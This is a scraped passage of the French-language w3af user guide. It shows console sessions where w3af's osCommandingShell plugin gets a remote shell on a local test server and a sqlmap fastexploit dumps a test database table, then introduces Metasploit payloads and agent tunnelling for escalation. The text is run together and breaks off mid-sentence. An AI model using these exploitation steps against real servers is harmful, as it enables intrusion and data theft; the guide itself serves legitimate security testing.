w3af Guide de l'Utilisateur - Exploit Database

More documents

Recommendations

Info

w3af/exploit>>>exploit osCommandingShellosCommandingShell exploit plugin is starting.The vulnerability was found using method GET, tried to changethe method to POST for exploiting but failed.Vulnerability successfully exploited. This is a list ofavailable shells:- [0] Please use the interact command to interact with the shellobjects.w3af/exploit>>>interact 0Execute "endInteraction" to get out of the remote shell.Commands typed in this menu will be runned on the remote webserver.w3af/exploit/osCommandingShell-0>>>lsvulnerable.phpvulnerable2.phpw3afAgentClient.logw3af/exploit/osCommandingShell-0>>>endInteractionw3af/exploit>>>backw3af>>>La deuxième manière est d'utiliser fastexploit. Cette méthode doit être utiliséequand l'utilisateur a trouvé une vulnérabilité manuellement et souhaite l'exploiteren utilisant le framework. Voici un exemple d'utilisation de fastexploit:w3af>>> exploitw3af/exploit>>> exploit config sqlmapw3af/plugin/sqlmap>>> set urlhttp://localhost/w3af/blindSqli/blindSqli-integer.phpw3af/plugin/sqlmap>>> set injvar idw3af/plugin/sqlmap>>> set data id=1w3af/plugin/sqlmap>>> backw3af/exploit>>> fastexploit sqlmapsqlmap coded by inquis and belchSQL injection could be verified, trying to create the DB driver.
Execute "exitPlugin" to get out of the remote shell. Commandstyped in this menu will be runned on the remote web server.w3af/exploit/sqlmap>>> dump agenda w3af_testDatabase: w3af_testTable: agenda[2 entries]+---------------+----+--------+----------+-----------------+| direccion | id | nombre | telefono | email |+---------------+----+--------+----------+-----------------+| direccion 123 | 1 | apr | 52365786 | acho@c.com || direccion 333 | 2 | vico | 47998123 | vTro@c.com |+---------------+----+--------+----------+-----------------+w3af/exploit/sqlmap>>>Techniques d'exploitation avancéesLe framework implémente deux techniques d'exploitation très poussées quipermettent à l'utilisateur d'élever ses privilèges sur le réseau distant. Ces deuxtechniques sont mises en oeuvre uen fois que le framework est capabled'exécuter des commandes système à distance, c'est le cas (par exemple) pourles plugins d'attaque osCommanding, remoteFileIncludeShell et davShell. Cestechniques d'exploitation sont:●●Virtual daemon, vous permet d'utiliser des payloads Metasploit pourexploiter le serveur qui héberge une application web vulnérable.w3afAgent, qui crée un tunnel entre le serveur compromis et w3af,permettant à l'utilisateur de router les connexions TCP via le serveurdistant.Toutes les deux sont simples à employer en utilisant ce guide. Ces fonctionnalitéssont en plein chantier de développement et ne sont aucunement stables; utilisezlesà vos risques et périls.Virtual daemonComme dit précédemment, cette fonctionnalité vous permet d'utiliser les chargesutiles du Metasploit pour exploiter le serveur hébergeant uen application webvulnérable. Pour utiliser cette fonctionnalité, vous devez avoir une installationfonctionnelle de la version 3.0 ou supérieure du Framework Metasploit. Vouspouvez l'obtenir gratuitement sur www.metasploit.com, l'installation et laconfiguration du MSF sortant du cadre de ce document.Pour être à même d'utiliser virtual daemon; vous allez devoir lancer la commande
Page 1 and 2: w3af Guide de l'UtilisateurVersion:
Page 3 and 4: IntroductionCe document est un guid
Page 5: Etapes w3afAvant même de lancer w3
Page 8 and 9: | assert | Check assertion. ||-----
Page 10 and 11: Exécuter w3af avec l'interface uti
Page 12: Configuration de PluginLes plugins
Page 15 and 16: The extensions parameter is a comma
Page 17 and 18: Démarrer un scanAprès avoir confi
Page 19 and 20: ......The URL: http://localhost/bee
Page 21 and 22: Avertissement sur la découverteLa
Page 23 and 24: commande à la main dans la console
Page 25 and 26: w3af/exploit/osCommandingShell-0>>>
Page 27 and 28: time=0.037 ms64 bytes from localhos
Page 29: - http://localhost/w3af/ | Method:
Page 33 and 34: l'exploitation.Maintenant que l'on
Page 35 and 36: Please wait some seconds while w3af
Page 37 and 38: w3afAgentComme vu dans un épisode
Page 39 and 40: Please wait some seconds while w3af
Page 41 and 42: Plus d'informationsDavantage d'info

w3af Guide de l'Utilisateur - Exploit Database

Create successful ePaper yourself

Delete template?

Save as template?